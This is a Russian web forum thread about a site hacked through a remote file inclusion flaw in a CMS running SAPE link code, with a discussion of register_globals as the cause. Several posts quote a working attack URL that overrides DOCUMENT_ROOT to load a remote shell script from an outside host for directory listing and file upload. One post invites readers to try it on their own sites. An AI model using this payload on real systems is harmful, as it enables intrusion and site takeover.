Вернуться   Форум SAPE.RU > Система SAPE.ru > Ошибки при работе с системой

-->
Ответ
 
Опции темы
Старый 14.11.2008, 09:16   #1
Новичок
 
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
Abend на пути к лучшему
Exclamation Код SAPE,проблема безопасности возможность заливки шелла

Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a
При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому
SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого.
Abend вне форума   Ответить с цитированием
Старый 14.11.2008, 13:01   #2
Велес
 
Аватар для Veles
 
Регистрация: 01.07.2007
Адрес: Россия
Сообщений: 1,422
Вес репутации: 264
Veles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущееVeles - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Abend Посмотреть сообщение
Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a
При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому
SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого.
Прочёл два раза, но так и не уловил прямой связи вспарывания сайта с блоком ссылок SAPE. Отключение блоков - это уже следствие...
Подробнее, плиз...
__________________
Wish You Were Here...
Veles вне форума   Ответить с цитированием
Старый 14.11.2008, 15:56   #3
Новичок
 
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
Abend на пути к лучшему
По умолчанию

В CMS в index.php стоит код
Код:
if (!defined('_SAPE_USER')){
        define('_SAPE_USER', '***'); 
    }
    require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
    $sape_context = new SAPE_context();
И в качестве ссылки для взлома участвовал кусок функции _SERVER [DOCUMENT_ROOT]. Поэтому я и предложил, что виноват этот код. Удалив его, все стало нормально , при нажатии на ссылку ничего не происходило.
Abend вне форума   Ответить с цитированием
Старый 14.11.2008, 16:28   #4
Вредина
 
Аватар для Jooz
 
Регистрация: 03.07.2007
Адрес: д.Коноплянка
Сообщений: 3,535
Вес репутации: 432
Jooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущееJooz - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Abend Посмотреть сообщение
В CMS в index.php стоит код
Код:
if (!defined('_SAPE_USER')){
        define('_SAPE_USER', '***'); 
    }
    require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
    $sape_context = new SAPE_context();
И в качестве ссылки для взлома участвовал кусок функции _SERVER [DOCUMENT_ROOT]. Поэтому я и предложил, что виноват этот код. Удалив его, все стало нормально , при нажатии на ссылку ничего не происходило.
А это уже как сервер сконфигурировать, сапа тут не не причем.
__________________
Чтобы произошло чудо нужно обязательно дунуть. Если не дунуть - чуда не произойдет!
Jooz вне форума   Ответить с цитированием
Старый 14.11.2008, 22:42   #5
Новичок
 
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
sitepromoter не любят в этих краях
По умолчанию

Цитата:
Сообщение от Jooz Посмотреть сообщение
А это уже как сервер сконфигурировать, сапа тут не не причем.
Ага, а конкретнее - register_globals: http://ru2.php.net/manual/ru/security.globals.php
sitepromoter вне форума   Ответить с цитированием
Старый 14.11.2008, 22:53   #6
Новичок
 
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
Abend на пути к лучшему
По умолчанию

Дирректива на хосте
Register globals: Off

Ради интереса попробуйте свой сайт перейдите по ссылке
Код:
http://www.Ваш сайт.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/путь/к вашей дире/www/site1/public_html/admin&sort=0a
Должен открыться листинг ваших дирректорий. Не знаю, как на других движках, на Slaed 2.6 Lite Final , действует отлично

Последний раз редактировалось Abend; 14.11.2008 в 23:02.
Abend вне форума   Ответить с цитированием
Старый 14.11.2008, 23:19   #7
Новичок
 
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
sitepromoter не любят в этих краях
По умолчанию

Цитата:
Сообщение от Abend Посмотреть сообщение
Дирректива на хосте
Register globals: Off
Вы не доверяете документации? Цитата с оф.сайта:

Цитата:
В случае, если установленное значение off, переменная $authorized не может быть установлена из внешних данных запроса
Проверил у себя. register_globals off, $_SERVER[DOCUMENT_ROOT] не меняется при передаче из строки браузера.

Кстати, может это движок ваш меняет на on?
В любом случае, всем не помешает проверить свои сайты на безопасность.
sitepromoter вне форума   Ответить с цитированием
Старый 15.11.2008, 00:39   #8
Новичок
 
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
Abend на пути к лучшему
По умолчанию

Да, ВЫ правы.
мой движок меняет на On
Попробовал через htaccess насильно сделать
php_value register _ globals off
Тогда не работает на CMS каталог файлов.
Ну и что вы думаете, в моем случае медицина бессильна?
Abend вне форума   Ответить с цитированием
Старый 15.11.2008, 01:09   #9
Новичок
 
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
sitepromoter не любят в этих краях
По умолчанию

Цитата:
Сообщение от Abend Посмотреть сообщение
Да, ВЫ правы.
мой движок меняет на On

Ну и что вы думаете, в моем случае медицина бессильна?
Я так подозреваю что перед кодом сапы надо выключить регистер_глобалс, а после - включить обратно.
sitepromoter вне форума   Ответить с цитированием
Старый 15.11.2008, 01:20   #10
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от sitepromoter Посмотреть сообщение
Я так подозреваю что перед кодом сапы надо выключить регистер_глобалс, а после - включить обратно.
Не поможет
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Скоро зима (техника безопасности) RadoM Курилка 1 29.10.2008 09:29
Брешь в безопасности kuraga Ошибки при работе с системой 0 02.10.2008 16:03
Проблема с sape legent Вопросы от новичков 8 12.06.2008 12:51
Проблема с установкой Sape в DLE Aesha Ошибки при работе с системой 4 12.09.2007 13:10
Проблема с роботом SAPE bs1 Вопросы по работе системы 2 28.07.2007 13:30


Часовой пояс GMT +3, время: 08:51.